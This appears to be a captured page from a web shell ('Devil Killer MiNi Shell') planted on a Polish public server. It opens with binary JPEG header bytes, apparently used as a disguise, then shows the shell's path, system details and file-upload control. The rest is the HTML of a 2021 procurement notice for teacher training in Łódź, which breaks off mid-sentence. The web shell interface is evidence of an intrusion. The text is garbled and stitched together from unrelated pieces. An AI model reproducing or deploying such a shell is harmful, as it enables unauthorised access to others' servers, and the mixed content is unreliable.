JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210721/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210721/0012279301-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00122793 z dnia 2021-07-21</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi szkoleniowe dla nauczycieli i słuchaczy Zespołu Szkół i Placówek Oświatowych Nowoczesnych Technologii <br/>Województwa Łódzkiego w Łodzi </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Województwo Łódzkie-Zespół Szkół i Placówek Oświatowych Nowoczesnych Technologii Województwa Łódzkiego w Łodzi</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 380827452</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Narutowicza 122</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">90-145</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">42 6319848</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">42 6319848</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@nowoczesnaszkola.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.nowoczesnaszkola.edu.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi szkoleniowe dla nauczycieli i słuchaczy Zespołu Szkół i Placówek Oświatowych Nowoczesnych Technologii <br/>Województwa Łódzkiego w Łodzi </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-723726e8-ea12-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00122793</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00067726/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Usługi szkoleniowe dla nauczycieli i słuchaczy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Akademia Programowania i Multumediów oraz Akademia Kulinarna </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.nowoczesnaszkola.edu.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">miniPortalu https://miniPortal.uzp.gov.pl, ePUAP (Elektroniczna Skrzynka Podawcza –nazwa – ZESPÓŁ SZKÓŁ I PLACÓWEK OŚWIATOWYCH NOWOCZESNYCH TECHNOLOGII WOJEWÓDZTWA ŁÓDZKIEGO) https://epuap.gov.pl/wps/portal oraz poczty elektronicznej e-mail: sekretariat@nowoczesnaszkola.edu.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.2<br/>Komunikacja między Zamawiającym a Wykonawcą odbywa się zgodnie z Rozporządzeniem Prezesa<br/>Rady Ministrów z dnia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych<br/>oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (Dz.U. poz. 2452) oraz Rozporządzeniem Ministra Rozwoju, Pracy i Technologii z dnia 23<br/>grudnia 2020 r w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń jakich może żądać zamawiający od wykonawcy (Dz. U. poz. 2415).<br/>1.3 Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi<br/>posiadać konto na ePUAP i dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz<br/>do formularza do komunikacji.1.4 Wymagania techniczne i organizacyjne wysyłania i odbierania<br/>dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przy ich użyciu zostały opisane w Instrukcji użytkowania systemu miniPortal oraz<br/>Regulaminie ePUAP. 1.5 Maksymalny rozmiar plików przesyłanych za pośrednictwem formularzy -do<br/>150 MB.<br/>1.6 Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP. 1.7 Identyfikator postępowania stanowi Załącznik nr 8 do SWZ.<br/>2.1 Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub<br/>wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu. W formularzu oferty<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - UsługiWykonawca zobowiązany jest podać adres skrzynki ePUAP, 2.2 Ofertę należy sporządzić w języku<br/>polskim. 2.3 Sposób złożenia oferty w tym zaszyfrowania oferty opisany został w Instrukcji użytkownika<br/>systemu miniPortal-ePUAP. 2.4 Wykonawca, aby wziąć́ udział w postepowaniu o udzielenie<br/>zamówienia publicznego i złożyć ofertę do postępowania musi założyć konto na Platformie ePUAP. 2.5<br/>Oferta powinna być sporządzona w języku polskim, z zachowaniem postaci elektronicznej w<br/>szczególności w formacie danych .doc, .docx, .pdf i podpisana kwalifikowanym podpisem<br/>elektronicznym lub podpisem zaufanym lub podpisem osobistym. Sposób złożenia oferty w tym<br/>zaszyfrowania oferty opisany został w Instrukcji użytkowania systemu miniPortal. 2.7 Oferta może być<br/>składana tylko do upływu terminu składania ofert. 2.8 Wykonawca może przed upływem terminu do<br/>składania ofert zmienić lub wycofać ofertę za pośrednictwem Formularza do złożenia, zmiany,<br/>wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionych również na miniPortalu. 3.1 W<br/>postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym, a Wykonawcami w<br/>szczególności składanie oświadczeń, wniosków (innych niż wskazanych w pkt. 2.), zawiadomień oraz<br/>przekazywanie informacji odbywa się elektronicznie za pośrednictwem formularza dostępnego na<br/>ePUAP (Elektroniczna Skrzynka Podawcza – nazwa – ZESPÓŁ SZKÓŁ I PLACÓWEK<br/>OŚWIATOWYCH NOWOCZESNYCH TECHNOLOGII WOJEWÓDZTWA ŁÓDZKIEGO) oraz<br/>udostępnionego przez miniPortal (Formularz do komunikacji).<br/>podając numer ogłoszenia (BZP lub numer postępowania – numer referencyjny ID) lub za pomocą<br/>poczty elektronicznej, e-mail: sekretariat@nowoczesnaszkola.edu.pl.<br/>3.2.Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz<br/>informacje przy użyciu środków komunikacji elektronicznej, każda ze stron na żądanie drugiej strony<br/>niezwłocznie potwierdza fakt ich otrzymania.<br/>Pozostałe informacje znajdują się w rozdziale 16 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">: 1 Zgodnie z art. 13 ust. 1 i 2 ogólnego rozporządzenia o<br/>ochronie danych osobowych z dnia 27 kwietnia 2016 r. (rozporządzenie Parlamentu Europejskiego i<br/>Rady UE 2016/679 w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE)<br/>uprzejmie informujemy, że:<br/>1.1 Administratorem danych osobowych jest Dyrektor Zespołu Szkół i Placówek Oświatowych<br/>Nowoczesnych Technologii Województwa Łódzkiego w Łodzi, ul. Gabriela Narutowicza 122, 90-145<br/>Łódź, tel./faks: 426319848, 784207390<br/>1.2 Administrator wyznaczył inspektora oraz zastępcę inspektora ochrony danych osobowych, z którymi<br/>może się Pani/Pan skontaktować poprzez e-mail sekretariat@nowoczesnaszkola.edu.pl. 1.3 Podanie<br/>danych osobowych jest warunkiem koniecznym do realizacji sprawy w Zespole Szkół i Placówek<br/>Oświatowych Nowoczesnych Technologii Województwa Łódzkiego w Łodzi.<br/>1.4 Dane osobowe mogą być udostępniane innym podmiotom, uprawnionym do ich otrzymania na<br/>podstawie obowiązujących przepisów prawa, tj. na podstawie art. 18 i art. 74 Prawa zamówień<br/>publicznych a ponadto odbiorcom danych w rozumieniu przepisów o ochronie danych osobowych, tj.<br/>podmiotom świadczącym usługi pocztowe, kurierskie, usługi informatyczne, bankowe,<br/>ubezpieczeniowe, osobom i podmiotom zainteresowanym prowadzonym postępowaniem o udzielenie<br/>zamówienia publicznego, a także podmiotom korzystającym z Biuletynu Informacji Publicznej,<br/>Biuletynu Zamówień Publicznych, Bazy konkurencyjności oraz internetowej platformy zakupowej –<br/>eKatalogi, będącej w gestii Urzędu Zamówień Publicznych. Dane osobowe nie będą przekazywane do<br/>państw trzecich, na podstawie szczególnych regulacji prawnych, w tym umów międzynarodowych. 1.5Dane osobowe będą przetwarzane, w tym przechowywane przez okres 4 lat, licząc od pierwszego<br/>stycznia roku następującego po roku, w którym sprawa została zakończona, a następnie, zgodnie z<br/>przepisami ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach, przez okres<br/>5 lat, zgodnie kategorią B5, w przypadku dokumentacji postępowania oraz 10 lat w związku z zawartą<br/>umową, zgodnie z kategorią archiwalną B10, a w przypadku zmiany kategorii archiwalnej dokumentacji<br/>przez okres zgodny ze zmienioną kategorią archiwalną dokumentacji. W przypadku zamówień<br/>finansowanych ze środków funduszy europejskich lub innych środków niż pochodzące z budżetu Unii<br/>Europejskiej na podstawie odrębnych przepisów tym zakresie do 25 lat.1.6 W związku z<br/>przetwarzaniem danych osobowych, na podstawie przepisów prawa, posiada Pani/Pan prawo do:<br/>a) dostępu do treści swoich danych, na podstawie art. 15 ogólnego rozporządzenia;<br/>b) sprostowania danych, na podstawie art. 16 ogólnego rozporządzenia;<br/>c) ograniczenia przetwarzania, na podstawie art. 18 ogólnego rozporządzenia.<br/>1.7 Ma Pani/Pan prawo wniesienia skargi do organu nadzorczego – Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy uzna Pani/Pan, iż przetwarzanie danych osobowych narusza przepisy o ochronie<br/>danych osobowych.<br/>1.8 Gdy podanie danych osobowych wynika z przepisów prawa, jest Pani/Pan zobowiązana(y) do ich<br/>podania. Konsekwencją niepodania danych osobowych będzie brak możliwości zawarcia umowy o<br/>udzielenie zamówienia publicznego.<br/>1.9 Dane nie będą przetwarzane w sposób zautomatyzowany, w tym również w formie profilowania.<br/>2 Wykonawca, wypełniając obowiązki informacyjne wynikający z art. 13 lub art. 14 RODO względem<br/>osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o<br/>udzielenie zamówienia publicznego w tym postępowaniu składa stosowne oświadczenie zawarte w<br/>Formularzu ofertowym (Załącznik nr 2 do SWZ).<br/>Pozostałe informacje znajdują się w rozdziale 29 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IP/XI.3.1/02</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 437317 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przeprowadzenie cyklu szkoleń dla nauczycieli oraz szkoleń dla innych uczestników projektu - słuchaczy w ramach realizacji projektu „Akademia Programowania i Multimediów” współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014-2020- zgodnie ze szczegółowym opisem określonym w pkt I OPZ ( Załącznik nr 1 do SWZ)<br/>Szkolenia odbywać się będą w miejscu wskazanym przez Wykonawcę na terenie miasta Łodzi stacjonarnie, z zastrzeżeniem, że na żądanie Zamawiającego (w pełni w gestii Zamawiającego) odbywać się będą zdalnie na bezpłatnej platformie szkoleniowej, zabezpieczonej przez Wykonawcę.<br/>5.4. Szkolenia odbywać się będą w dniach tygodnia wskazanych w OPZ ( Załącznik nr 1 do SWZ)<br/>5.5. Z odbytych szkoleń słuchacze otrzymują zaświadczenia i certyfikaty wystawiane przez Wykonawcę- zgodnie z danymi zawartymi w Załączniku nr 1 do SWZ dla poszczególnych szkoleń<br/>5.6. Przez 1 godzinę szkoleniową (1 h) rozumie się 60 min.<br/>5.7. Na podstawie art. 95 ust. 1 ustawy Pzp Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie stosunku pracy osób wykonujących wskazane przez Zamawiającego czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 §1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (Dz. U z 2020 r., poz. 1320), tj. osób wykonujących w trakcie realizacji zamówienia czynności: Zamawiający nie stawia w tym zakresie żadnych wymogów. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 176133,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80510000-2 - Usługi szkolenia specjalistycznego</p> <p class="mb-0">80521000-2 - Usługi opracowywania programów szkoleniowych</p> <p class="mb-0">80530000-8 - Usługi szkolenia zawodowego</p> <p class="mb-0">80533100-0 - Usługi szkolenia komputerowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wyznaczył dla części 1 zamówienia następujące kryteria oceny ofert przypisując im odpowiednie wagi punktowe i przyjął, że w zakresie każdego kryterium wyboru oferty najkorzystniejszej 1% wagi kryterium.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów ze wszystkich kryteriów. Uzyskana liczba punktów w ramach kryterium zaokrąglona będzie do drugiego miejsca po przecinku. Jeżeli trzecia cyfra po przecinku (i/lub następne) jest mniejsza od 5 wynik zostanie zaokrąglony w dół, a jeżeli cyfra jest równa lub większa od 5 wynik zostanie zaokrąglony w górę.<br/>Każda z ofert otrzyma łączną liczbę punktów, jaka wynika ze wzoru:<br/>LP = C + D +L<br/>gdzie:<br/>LP - całkowita liczba punktów przyznanych ofercie<br/>C - liczba punktów jakie otrzyma oferta badana za kryterium „Cena oferty brutto w PLN”<br/>P - liczba punktów jakie otrzyma oferta badana za kryterium „Doświadczenie kadry”<br/>L - liczba punktów jakie otrzyma oferta badana za kryterium „Liczba godzin przeprowadzonych szkoleń”<br/>Oferta, która uzyska największą liczbę punktów (C + D + L ) w tej części zamówienia, zostanie uznana za ofertę najkorzystniejszą w tej części zamówienia. Łączna możliwa do uzyskania liczba punktów to 100.<br/>Pozostałe informacje znajdują się w rozdziale 24 pkt 24.1</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kadry</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba godzin przeprowadzonych szkoleń</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przeprowadzenie cyklu szkoleń dla nauczycieli w ramach realizacji projektu „Akademia Programowania i Multimediów” współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014-2020- zgodnie z pkt II OPZ ( Załącznik nr 1 do SWZ)<br/>Szkolenia odbywać się będą w miejscu wskazanym przez Wykonawcę na terenie miasta Łodzi stacjonarnie, z zastrzeżeniem, że na żądanie Zamawiającego (w pełni w gestii Zamawiającego) odbywać się będą zdalnie na bezpłatnej platformie szkoleniowej, zabezpieczonej przez Wykonawcę.<br/>5.4. Szkolenia odbywać się będą w dniach tygodnia wskazanych w OPZ ( Załącznik nr 1 do SWZ)<br/>5.5. Z odbytych szkoleń słuchacze otrzymują zaświadczenia i certyfikaty wystawiane przez Wykonawcę- zgodnie z danymi zawartymi w Załączniku nr 1 do SWZ dla poszczególnych szkoleń<br/>5.6. Przez 1 godzinę szkoleniową (1 h) rozumie się 60 min.<br/>5.7. Na podstawie art. 95 ust. 1 ustawy Pzp Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie stosunku pracy osób wykonujących wskazane przez Zamawiającego czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 §1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (Dz. U z 2020 r., poz. 1320), tj. osób wykonujących w trakcie realizacji zamówienia czynności: Zamawiający nie stawia w tym zakresie żadnych wymogów. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 16433,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80510000-2 - Usługi szkolenia specjalistycznego</p> <p class="mb-0">80521000-2 - Usługi opracowywania programów szkoleniowych</p> <p class="mb-0">80530000-8 - Usługi szkolenia zawodowego</p> <p class="mb-0">80533100-0 - Usługi szkolenia komputerowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy 